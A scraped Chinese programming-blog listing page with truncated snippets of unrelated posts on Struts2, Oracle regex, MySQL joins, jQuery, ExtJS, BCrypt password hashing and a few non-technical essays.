  • action执行2次 Chen.H JavaScriptjspXHTMLcssWebwork
    xwork 写道 <action name="userTypeAction" class="com.ekangcount.website.system.view.action.UserTypeAction"> <result name="ssss" type="dispatcher">
  • [时空与能量]逆转时空需要消耗大量能源 comsci 能源
            无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越.....         在进行时空穿梭的实验中,消耗超大规模的能源是必然
  • oracle的正则表达式(regular expression)详细介绍 daizj oracle正则表达式
        正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入,好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。 正则表达式中常用到的元数据(metacharacter)如下: ^ 匹配字符串的开头位置。 $ 匹配支付传的结尾位置。 *
  • 报表工具与报表性能的关系 datamachine 报表工具birt报表性能润乾报表
    在选择报表工具时,性能一直是用户关心的指标,但是,报表工具的性能和整个报表系统的性能有多大关系呢? 要回答这个问题,首先要分析一下报表的处理过程包含哪些环节,哪些环节容易出现性能瓶颈,如何优化这些环节。   一、报表处理的一般过程分析 1、用户选择报表输入参数后,报表引擎会根据报表模板和输入参数来解析报表,并将数据计算和读取请求以SQL的方式发送给数据库。   2、
  • 初一上学期难记忆单词背诵第一课 dcj3sjt126com wordenglish
    what 什么  your 你 name 名字 my 我的 am 是 one 一 two 二 three 三 four 四 five 五 class 班级,课   six 六 seven 七 eight 八 nince 九 ten 十 zero 零 how 怎样 old 老的 eleven 十一 twelve 十二 thirteen
  • 我学过和准备学的各种技术 dcj3sjt126com 技术
    语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html 
  • struts2中token防止重复提交表单 蕃薯耀 重复提交表单struts2中token
    struts2中token防止重复提交表单   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月12日 11:52:32 星期日 ht
  • 线性查找二维数组 hao3100590 二维数组
    1.算法描述 有序(行有序,列有序,且每行从左至右递增,列从上至下递增)二维数组查找,要求复杂度O(n)   2.使用到的相关知识: 结构体定义和使用,二维数组传递(http://blog.csdn.net/yzhhmhm/article/details/2045816)   3.使用数组名传递 这个的不便之处很明显,一旦确定就是不能设置列值 //使
  • spring security 3中推荐使用BCrypt算法加密密码 jackyrong Spring Security
    spring security 3中推荐使用BCrypt算法加密密码了,以前使用的是md5, Md5PasswordEncoder 和 ShaPasswordEncoder,现在不推荐了,推荐用bcrpt Bcrpt中的salt可以是随机的,比如: int i = 0; while (i < 10) { String password = "1234
  • 学习编程并不难,做到以下几点即可! lampcy javahtml编程语言
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • 架构师之mysql----------------用group+inner join,left join ,right join 查重复数据(替代in) nannan408 right join
    1.前言。   如题。 2.代码 (1)单表查重复数据,根据a分组   SELECT m.a,m.b, INNER JOIN (select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a (2)多表查询 , 使用改为le
  • jQuery选择器小结 VS 节点查找(附css的一些东西) Everyday都不同 jquerycssname选择器追加元素查找节点
    最近做前端页面,频繁用到一些jQuery的选择器,所以特意来总结一下:   测试页面: <html> <head> <script src="jquery-1.7.2.min.js"></script> <script> /*$(function() { $(documen
  • 关于EXT tntxia ext
      ExtJS是一个很不错的Ajax框架,可以用来开发带有华丽外观的富客户端应用,使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写,与后台技术无关的前端ajax框架。因此,可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。       ExtJs最开始基于YUI技术,由开发人员Jack
  • 一个MIT计算机博士对数学的思考 xjnine Math
     在过去的一年中,我一直在数学的海洋中游荡,research进展不多,对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界?作为计算机的学生,我没有任何企图要成为一个数学家。我学习数学的目的,是要想爬上巨人的肩膀,希望站在更高的高度,能把我自己研究的东西看得更深广一些。说起来,我在刚来这个学校的时候,并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目,是对appe
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他